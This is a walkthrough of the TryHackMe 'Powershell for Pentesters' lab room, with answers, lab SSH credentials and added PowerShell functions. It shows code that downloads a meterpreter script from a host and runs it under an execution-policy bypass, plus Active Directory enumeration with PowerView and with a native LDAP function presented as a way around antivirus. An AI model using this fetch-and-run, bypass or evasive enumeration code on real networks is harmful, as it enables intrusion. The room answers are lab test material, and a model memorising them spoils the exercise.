# Powershell for Pentesters

This room can be found [here](https://tryhackme.com/room/powershellforpentesters). This section will cover the basics of PowerShell that will be useful in any engagement.

Target machine SSH credentials:

* Username: walter
* Password: Kowacs123!

We can then run `powershell` to access PowerShell.

## Task 1

Most of the command-line portions of pentest training focus on Linux, but most corporate systems run Windows, so a Red Team member needs to be at home in both operating systems.

There are several PowerShell scripts useful in penetration tests, such as PowerView and Nishang. The downside to these and similar tools is that they are detected by most AV (antivirus) software, so expect them to be flagged when dropped onto a target.

### Question 1: What useful PowerShell script did you find on Walter's desktop?

`powerview.ps1` - `dir` on Walter's desktop lists the files

![](https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FUbPbkLLB3q7ZLUg84Ej6%2Fimage.png?alt=media\&token=90494c9d-5098-43ae-9c1e-dd6a87b5180b)

## Task 2

`Start-Process` - Used to start a process, such as notepad.

`Get-Process` - Lists all running processes. Can also be used with the `-Name` parameter to filter for a specific process.

`(command) | Export-Csv` - Exports the objects produced by the preceding command to a .csv file, which is easier to read and to search later.

`Get-Content` - Shows the contents of a file. Similar to the `cat` command on Linux.

`Copy-Item` - Copies an item.

`Move-Item` - Moves an item.

`Get-FileHash` - Computes the hash of the specified file. The default algorithm is SHA256; use `-Algorithm` to choose another, e.g. MD5.

### Question 1: What is the MD5 hash value of the file on Walter's desktop?

`501570FFBA7FACE69D61DA1A0843E89A` - `Get-FileHash -Algorithm MD5 .\Desktop\powerview.ps1` gives us the MD5 hash (without `-Algorithm MD5` the cmdlet would return the SHA256 hash instead).

![](https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2F7H8RWxAVGRiqnvLbte7o%2Fimage.png?alt=media\&token=4927ba79-462b-421d-9b64-1c80cfea7a46)

## Task 3

### Downloading files

There are multiple ways to download files from a server using PowerShell. ***One*** of the quickest is the .NET `WebClient` class and its `DownloadFile` method.

* `(New-Object System.Net.WebClient).DownloadFile('URL/File', 'Output-File')`
  * Example: `(New-Object System.Net.WebClient).DownloadFile('http://10.0.2.8/meterpreter-64.ps1', 'meterpreter.ps1')`

This connects to the host 10.0.2.8 and downloads the `meterpreter-64.ps1` file. The file is saved locally as "`meterpreter.ps1`". Note the `.` between the object and the method call; without it PowerShell reports a syntax error.

Another method is `Invoke-WebRequest`:

* `Invoke-WebRequest "URL/File" -OutFile "File"`
  * `Invoke-WebRequest "http://10.0.2.8/meterpreter-64.ps1" -OutFile "meterpreter.ps1"`

### Execution Policies

Once we have the file downloaded we can run it, but we may run into an `ExecutionPolicy` issue. Microsoft states that the *ExecutionPolicy* is NOT a security feature; it is a safety measure against accidentally running scripts, and the user can bypass it.

The current state of the execution policy at every scope can be seen with `Get-ExecutionPolicy -List`.

Execution policies can have seven different values:

* `AllSigned` - Scripts can run, but every script (local or downloaded) must be signed by a trusted publisher.
* `Bypass` - All scripts can run, and no warnings or prompts are displayed.
* `Default` - Refers to `Restricted` on Windows clients and `RemoteSigned` on Windows servers.
* `RemoteSigned` - Local scripts run unsigned; scripts downloaded from the internet must be signed by a trusted publisher.
* `Restricted` - The default for Windows clients. Individual commands can run, but no scripts.
* `Undefined` - No execution policy is set at this scope, so the default policy is enforced.
* `Unrestricted` - All scripts run; a warning is shown before running scripts downloaded from the internet.

We have several ways to bypass the ExecutionPolicy, though some require administrator privileges. The most common is to start `powershell` with the policy overridden on the command line (`-Exec` is an abbreviation of `-ExecutionPolicy`):

* `powershell -ExecutionPolicy Bypass -File .\(File)`
  * Example: `powershell -ExecutionPolicy Bypass -File .\meterpreter.ps1`
* `powershell -Exec Bypass -File .\(File)`
  * Example: `powershell -Exec Bypass -File .\meterpreter.ps1`

We can also change the policy for just the current process with `Set-ExecutionPolicy Bypass -Scope Process` and then run the file. The `Process` scope needs no administrator rights and nothing is written to the registry; the change disappears when the session exits.
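The download and execution-policy steps above combined into one function, as an added example that is not part of the room. It uses `WebClient` to fetch the script, checks the download with `Get-FileHash` before running anything, and applies the `Process`-scoped bypass in the current session. The URL, file name and the `-ExpectedSha256` value are placeholders for whatever you are serving from your own host.

```powershell
# Added example (not from the room): download a script, verify it, and run it with a
# process-scoped execution policy. Nothing here needs administrator rights.
function Invoke-DownloadedScript {
    param(
        [Parameter(Mandatory)][string]$Url,
        [Parameter(Mandatory)][string]$OutFile,
        [string]$ExpectedSha256          # optional: hash computed on the serving host
    )

    # Older Windows builds default WebClient to TLS 1.0, which many servers now refuse.
    [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12

    # Same effect as: Invoke-WebRequest $Url -OutFile $OutFile
    $wc = New-Object System.Net.WebClient
    $wc.DownloadFile($Url, $OutFile)

    # Refuse to run a file that is not the one we staged (proxy tampering, wrong file served, ...)
    if ($ExpectedSha256) {
        $actual = (Get-FileHash -Algorithm SHA256 -Path $OutFile).Hash
        if ($actual -ne $ExpectedSha256) {
            throw "Hash mismatch for $OutFile : expected $ExpectedSha256, got $actual"
        }
    }

    Write-Host "Execution policy before: $(Get-ExecutionPolicy)"
    # Only this powershell.exe process is affected; CurrentUser/LocalMachine are untouched.
    Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope Process -Force
    Write-Host "Execution policy now:    $(Get-ExecutionPolicy)"

    # Run the script. Use dot-sourcing (". $OutFile") instead if you need its
    # functions to remain loaded in this session, e.g. for a module like PowerView.
    & $OutFile
}

# Placeholder host and file names; pass -ExpectedSha256 with the value from
# Get-FileHash on the machine serving the script.
Invoke-DownloadedScript -Url 'http://10.0.2.8/meterpreter-64.ps1' -OutFile '.\meterpreter.ps1'
```

`Get-ExecutionPolicy` without `-List` prints the effective policy, so the two `Write-Host` lines show the change taking effect for this process only; `Get-ExecutionPolicy -List` afterwards still shows the user and machine scopes unchanged.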

## Task 4

* `Get-HotFix` - Enumerate already installed patches
  * `Get-HotFix | Format-List | findstr InstalledOn`
  * `Get-HotFix | Format-Table HotFixID`
* `Format-List` - Shows every property of the objects in the pipeline, one per line
  * `dir | Format-List`
* `Out-File` - Saves the output to a file for later use
  * `Get-HotFix | Out-File Hotfixes.txt`
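Filtering the hotfix list by install date with `Where-Object` instead of piping `Format-List` through `findstr`, as an added example that is not part of the room. The function works on the `InstalledOn` property as a date, so it also handles entries where that value is missing and is independent of the display format. The date and output file name are the ones this task needs; `-ComputerName` defaults to the local host.

```powershell
# Added example (not from the room): find patches installed on a given day and keep
# a sorted patch timeline for the report.
function Get-HotFixByDate {
    param(
        [Parameter(Mandatory)][datetime]$Date,
        [string]$ComputerName = $env:COMPUTERNAME
    )
    Get-HotFix -ComputerName $ComputerName |
        # InstalledOn is $null for some entries, so test it before comparing.
        Where-Object { $_.InstalledOn -and $_.InstalledOn.Date -eq $Date.Date } |
        Select-Object HotFixID, Description, InstalledBy, InstalledOn
}

# Parse the date with an explicit format so the script behaves the same under any locale.
$target = [datetime]::ParseExact('2019-05-15', 'yyyy-MM-dd', [cultureinfo]::InvariantCulture)
Get-HotFixByDate -Date $target        # answers "what was installed on 5/15/2019?"

# Newest patches first; a gap in this list hints at which public CVEs are still open.
Get-HotFix |
    Sort-Object InstalledOn -Descending |
    Select-Object HotFixID, Description, InstalledOn |
    Export-Csv -NoTypeInformation -Path .\Hotfixes.csv
```

`Get-HotFix` only reports updates recorded through Windows Update / WUSA; patches applied by other means (MSI installers, in-place upgrades) do not appear, so treat the list as a lower bound on what is installed.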

### Question 1: What Windows Security Update was installed on 5/15/2019?

`KB4499728` - `Get-HotFix` can give us our answer

![](https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2Fnkp0dKcA1fNSmwCYIJXI%2Fimage.png?alt=media\&token=a337fbac-0b1e-4966-abc4-9439896ec154)

## Task 6

PowerView is one of the most effective ways to gather information on the domain. The module can be downloaded from [here](https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1).

Once we download the file, we need to bypass the execution policy and then import the module in that same session. Starting a new `powershell` process with the policy bypassed and importing the script in it works; running `powershell -Exec Bypass .\powerview.ps1` does not, because the functions are loaded into a child process that exits immediately.

`powershell -Exec Bypass`

`Import-Module .\powerview.ps1`

Alternatively, run `Set-ExecutionPolicy Bypass -Scope Process` in the current session and then the same `Import-Module` line.

![](https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2Fsuxo56iPiBKgqssYkRu3%2Fimage.png?alt=media\&token=06766c5b-e15b-48ff-9bcc-6690eafc4a1a)

With PowerView imported we can use it to obtain information on the domain configuration and its users.

* `Get-NetDomainController` - Collect information on the domain controller
* `Get-NetUser` - Provide a list of domain users. Depending on the size of the company, we may want to output this to a .csv
  * `Get-NetUser | select -ExpandProperty lastlogon` expands on this command to view each user's last logon date/time
* `Get-NetComputer` - Enumerate systems joined to the domain
* `Get-NetGroup` - Enumerate existing groups
  * `Get-NetGroupMember "Domain Admins"` lists the members of the "Domain Admins" group
* `Find-DomainShare` - Lists available shares
* `Get-NetGPO` - Gather information on policies enforced through Group Policy
* `Find-LocalAdminAccess` - List systems in the domain on which the current user has local administrator access
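The user, description, disabled-account and group-membership queries used in the questions below, done with the .NET `DirectorySearcher` that PowerView wraps. This is an added example, not PowerView's code or part of the room; it is here because, as the intro notes, `powerview.ps1` itself is often flagged by AV, and the same LDAP queries can be issued from a plain PowerShell session on any domain-joined host. It assumes a domain user context such as walter's session. The LDAP filters and the `0x2` `ACCOUNTDISABLE` bit of `userAccountControl` are standard Active Directory, not assumptions.

```powershell
# Added example (not from the room or PowerView): native LDAP enumeration of users,
# descriptions, disabled accounts and Domain Admins members via System.DirectoryServices.

function Get-AdsiValue {
    param($Result, [string]$Name)
    # Each attribute comes back as a value collection; a missing attribute is an empty one.
    $vals = $Result.Properties[$Name]
    if ($vals.Count -gt 0) { return $vals[0] }
    return $null
}

function New-DomainSearcher {
    param([string]$Filter)
    # RootDSE tells us the domain's naming context, so no domain name needs hard-coding.
    $rootDse  = [ADSI]'LDAP://RootDSE'
    $domain   = [ADSI]"LDAP://$($rootDse.defaultNamingContext)"
    $searcher = New-Object System.DirectoryServices.DirectorySearcher($domain, $Filter)
    $searcher.PageSize = 1000      # paged results, otherwise the DC caps the answer at 1000 objects
    return $searcher
}

function Get-DomainUserInfo {
    # One object per user account: logon name, real name, description and disabled state.
    $s = New-DomainSearcher -Filter '(&(objectCategory=person)(objectClass=user))'
    [void]$s.PropertiesToLoad.AddRange([string[]]@('samaccountname', 'givenname', 'sn', 'description', 'useraccountcontrol'))
    foreach ($r in $s.FindAll()) {
        $uac = [int](Get-AdsiValue $r 'useraccountcontrol')
        [pscustomobject]@{
            SamAccountName = [string](Get-AdsiValue $r 'samaccountname')
            FirstName      = [string](Get-AdsiValue $r 'givenname')
            LastName       = [string](Get-AdsiValue $r 'sn')
            Description    = [string](Get-AdsiValue $r 'description')
            Disabled       = [bool]($uac -band 0x2)     # ACCOUNTDISABLE flag
        }
    }
}

function Get-DomainGroupMembers {
    param([string]$GroupName = 'Domain Admins')
    # Direct members only: nested groups are listed as members but not expanded.
    $s = New-DomainSearcher -Filter "(&(objectClass=group)(cn=$GroupName))"
    [void]$s.PropertiesToLoad.Add('member')
    $group = $s.FindOne()
    if (-not $group) { return }
    foreach ($dn in $group.Properties['member']) {
        $entry = [ADSI]"LDAP://$dn"    # resolve the member DN to its logon name
        [pscustomobject]@{
            SamAccountName    = [string]$entry.Properties['sAMAccountName'].Value
            DistinguishedName = $dn
        }
    }
}

$users = Get-DomainUserInfo
$users | Where-Object { $_.Description } | Select-Object SamAccountName, Description      # accounts with a description
$users | Where-Object { $_.Disabled }    | Select-Object SamAccountName, FirstName, LastName
$users | Export-Csv -NoTypeInformation -Path .\domain_users.csv                          # copy for the report

$admins = @(Get-DomainGroupMembers -GroupName 'Domain Admins')
"Domain Admins: $($admins.Count) direct members"
$admins
```

The disabled count includes built-in accounts that have no first name set, which is why a count of disabled accounts and a list of disabled people can differ. Because `Get-DomainGroupMembers` does not recurse, a group nested inside Domain Admins shows up as one member; resolve its own `member` attribute the same way if you need the full set of privileged users.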

### Question 1: One of the accounts has a special description, what is it?

`IDF-17828290` - `Get-NetUser -Properties distinguishedname,cn,sn,description,useraccountcontrol` gives us the details. We can of course add further properties as needed.

![](https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FS2cNhLRqRuIUGgQwFCx2%2Fimage.png?alt=media\&token=f682cd23-a9b1-478c-90dd-bd2ff33080fd)

### Question 2: How many accounts are disabled?

`4` - From the previous command's output we can count the accounts whose `useraccountcontrol` carries the `ACCOUNTDISABLE` flag.

### Question 3: How many users are in the "domain admins" group?

`3` - `Get-NetGroupMember "Domain Admins"` gives us our answer

![](https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2F8hy8nYdY8SmDmc5VCRyS%2Fimage.png?alt=media\&token=ac71db9c-eafd-4864-8248-27c27f499aca)

### Question 4: Which users are in the "domain admins" group?

`usand, ssilk, ServerAdmin` - The previous command and screenshot give us our answer.

### Question 5: List shares, what is the name of the "interesting" share?

`operationfiles` - `Find-DomainShare -CheckShareAccess` lists only the shares the current user can read. Most of them look like default shares; this one stands out.

![](https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FLiwLl84W5LRvNmTlf8gw%2Fimage.png?alt=media\&token=2ed6d8da-2cad-488e-8383-c8d530f5c938)

### Question 6: What is the name of the user-created Group Policy?

`Disable WinDef` - Running `Get-NetGPO -Properties displayname` lists the Group Policy display names; the default domain policies are easy to spot, and this one is the user-created GPO.

![](https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FVLcCUDzB1qVm3cGy6dtP%2Fimage.png?alt=media\&token=3ea700dd-9e0d-464d-80fe-9aad1889785e)

### Question 7: What are the first names of the users whose accounts were disabled?

`Daniel, Ursula` - Looking at our previous command, `Get-NetUser -Properties distinguishedname,cn,sn,description,useraccountcontrol`, we can see the first and last names of the users and which accounts are disabled.

![](https://667808901-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTdW22AGCceN8oUXfdlKI%2Fuploads%2FxKJdXQVauXStGyx1PhMe%2Fimage.png?alt=media\&token=172788d5-1a6c-4063-9879-416271c94c42)
